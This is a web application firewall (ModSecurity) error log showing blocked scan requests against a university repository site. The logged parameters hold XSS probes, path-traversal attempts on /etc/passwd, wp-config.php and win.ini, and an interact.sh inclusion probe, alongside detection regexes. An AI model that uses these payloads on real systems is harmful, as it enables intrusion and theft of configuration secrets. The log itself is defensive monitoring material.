[Tue Aug 29 11:54:22.866630 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-sCo-f0AAApgAzAAAAAH"]
[Tue Aug 29 11:54:22.884938 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAApbUTUAAAAh"]
[Tue Aug 29 11:54:23.574563 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAAoZ6c8AAAAK"]
[Tue Aug 29 11:54:25.080169 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAAph8vkAAAAj"]
[Tue Aug 29 11:54:27.052515 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAApXgd8AAAAU"]
[Tue Aug 29 11:54:27.108449 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:q: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16A8Co-f0AAAqWwVEAAAAl"]
[Tue Aug 29 11:54:27.572761 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAApXgeIAAAAU"]
[Tue Aug 29 11:54:29.743788 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAAoGFmkAAAAE"]
[Tue Aug 29 11:54:31.551786 2023] [:error] [pid 2716] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16B8Co-f0AAAqci6MAAAAv"]
[Tue Aug 29 11:54:31.662674 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAApgAzwAAAAH"]
[Tue Aug 29 11:54:32.968605 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAnHQyYAAAAT"]
[Tue Aug 29 11:54:33.559780 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAofnEAAAAAX"]
[Tue Aug 29 11:54:34.584666 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAAqXyPoAAAAq"]
[Tue Aug 29 11:54:35.554438 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16C8Co-f0AAAqQ@uAAAAAB"]
[Tue Aug 29 11:54:35.673648 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAAolKiYAAAAe"]
[Tue Aug 29 11:54:35.679010 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAApZHWoAAAAf"]
[Tue Aug 29 11:54:37.982271 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DcCo-f0AAApV23gAAAAJ"]
[Tue Aug 29 11:54:39.537558 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16D8Co-f0AAAqdbm0AAAAw"]
[Tue Aug 29 11:54:40.313666 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_d7f9fdf39193610aaa5fc6cb072e72086210c23b"): Internal error [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16D8Co-f0AAAqdbm0AAAAw"]
[Tue Aug 29 11:54:40.318346 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_1eea905f7d282aa5957c78190e760de321c2b972"): Internal error [hostname "repository.unla.ac.id"] [uri "/index.php/config.inc.php-good"] [unique_id "ZO16D8Co-f0AAApXgf0AAAAU"]
[Tue Aug 29 11:54:40.541828 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAAqRzDUAAAAM"]
[Tue Aug 29 11:54:41.573514 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAAqhN8kAAAAE"]
[Tue Aug 29 11:54:41.577321 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repository.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAAoz78YAAAAS"]
[Tue Aug 29 11:54:44.627633 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAAqWwYcAAAAl"]
[Tue Aug 29 11:54:46.620044 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAAqWwYwAAAAl"]
[Tue Aug 29 11:54:47.589628 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAApk-YMAAAAn"]
[Tue Aug 29 11:54:50.607303 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAApHRZYAAAAP"]
[Tue Aug 29 11:54:50.611777 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAAqdbosAAAAw"]
[Tue Aug 29 11:54:51.630602 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16G8Co-f0AAAqTvmAAAAAa"]
[Tue Aug 29 11:54:52.558918 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16HMCo-f0AAAqRzFIAAAAM"]
[Tue Aug 29 11:54:52.599589 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAAoz79wAAAAS"]
